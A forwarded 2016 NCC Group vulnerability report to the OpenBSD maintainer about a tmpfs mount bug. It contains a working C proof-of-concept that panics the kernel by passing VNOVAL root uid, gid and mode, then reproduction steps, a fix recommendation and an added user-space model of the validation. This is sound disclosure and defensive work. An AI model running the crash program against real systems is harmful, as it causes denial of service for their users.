Here's a bug related to tmpfs mounts.

-------- Forwarded Message --------

Subject:        [Bug49] Tmpfs mount with bad args can lead to a panic
Date:   Mon, 11 Jul 2016 10:07:33 -1000
From:   Tim Newsham <tim.newsham@nccgroup.trust>
To:     dera...@openbsd.org, Jesse Hertz <Jesse.Hertz@nccgroup.trust>



Hi Theo, here's a low-severity DoS issue.. root-only unless
kern.usermount is set.  Feel free to open it up to "tech" if you see
fit.  See writeup below.

------

/*
 * mount_panic.c
 *    Demonstrate a panic through the mount system call.
 *
 * gcc -g mount_panic.c -o mount_panic
 */

#ifdef BUG_WRITEUP //---------------------------------------------------
Tmpfs mount with bad args can lead to a panic

Impact:
Root users or users on systems with kern.usermount set to true can
trigger a kernel panic when mounting a tmpfs filesystem.

Description:
The tmpfs filesystem allows the mounting user to specify a
username, a groupname or a device name for the root node of
the filesystem.  A user that specifies a value of VNOVAL for
any of these fields will trigger an assert in tmpfs_alloc_node():

    /* XXX pedro: we should check for UID_MAX and GID_MAX instead. */
    KASSERT(uid != VNOVAL && gid != VNOVAL && mode != VNOVAL);

This condition can only be triggered by users who are allowed
to mount a tmpfs filesystem. Normally this is the root user, but
if the kern.usermount sysctl variable has been set to true,
any user could trigger this panic.

Reproduction:
Run the attached mount_panic.c program.  It will mount a tmpfs
filesystem with invalid settings and will lead to a panic of
"panic: kernel diagnostic assertion "uid != VNOVAL && gid != VNOVAL
&& mode != VNOVAL" failed".  NCC Group was able to reproduce this issue
on OpenBSD 5.9 release running amd64.

Recommendation:
Validate the args.ta_root_uid, args.ta_root_gid and args.ta_root_mode
fields in tmpfs_mount() before calling tmpfs_alloc_node().
Return an error to the user when an invalid argument is detected.

Reported: 2016-07-XX
Fixed:   notyet

#endif // BUG_WRITEUP ---------------------------------------------------


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/mount.h>

#define VNOVAL (-1)

int main(int argc, char **argv)
{
    struct tmpfs_args args;
    int x;

    memset(&args, 0, sizeof args);
    args.ta_version = TMPFS_ARGS_VERSION;
    args.ta_root_uid = VNOVAL;
    args.ta_root_gid = VNOVAL;
    args.ta_root_mode = VNOVAL;
    x = mount("tmpfs", "/mnt", 0, &args);
    if(x == -1)
        perror("mount");
    printf("no crash!\n");
    return 0;
}

-- 
Tim Newsham
Distinguished Security Engineer, Security Consulting
NCC Group
Tim.Newsham@nccgroup.trust | PGP: B415 550D BEE9 07DB B4C9  F96C 8EFE CB2F 402D 3DF0
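
The check the Recommendation in the forwarded writeup asks for, modelled in user space. This is an added example, not code from the report or from OpenBSD: the model_* names, the BAD macro and the 32-bit field widths are assumptions, and only VNOVAL and the three ta_root_* field names come from the message above.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define VNOVAL (-1)                 /* same sentinel the PoC defines */
#define BAD ((uint32_t)VNOVAL)      /* sentinel cast to the field type */

/* Hypothetical stand-in for the three struct tmpfs_args fields in the report. */
struct model_tmpfs_args {
    uint32_t ta_root_uid, ta_root_gid, ta_root_mode;
};

/* Models the precondition asserted in tmpfs_alloc_node():
 * 0 when it holds, -1 where the KASSERT would fire. */
static int model_alloc_node(uint32_t uid, uint32_t gid, uint32_t mode)
{
    return (uid != BAD && gid != BAD && mode != BAD) ? 0 : -1;
}

/* The recommended validation: reject the sentinel with an error. */
static int model_check_root_args(const struct model_tmpfs_args *a)
{
    if (a->ta_root_uid == BAD || a->ta_root_gid == BAD || a->ta_root_mode == BAD)
        return EINVAL;
    return 0;
}

/* Models the mount path. With validate set, bad args are refused before the
 * node allocation; *would_panic records whether the assertion was reached. */
static int model_tmpfs_mount(const struct model_tmpfs_args *a, int validate,
                             int *would_panic)
{
    int error;

    *would_panic = 0;
    if (validate && (error = model_check_root_args(a)) != 0)
        return error;
    if (model_alloc_node(a->ta_root_uid, a->ta_root_gid, a->ta_root_mode) != 0)
        *would_panic = 1;
    return 0;
}

int main(void)
{
    struct model_tmpfs_args poc = { BAD, BAD, BAD };  /* constructed input */
    int hit, rc;

    rc = model_tmpfs_mount(&poc, 0, &hit);
    printf("unvalidated: rc=%d assertion reached=%d\n", rc, hit);
    rc = model_tmpfs_mount(&poc, 1, &hit);
    printf("validated:   rc=%d assertion reached=%d\n", rc, hit);
    return 0;
}
```

Casting the sentinel to the field's own type keeps the comparison correct even on a platform where one of these fields is narrower than int.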

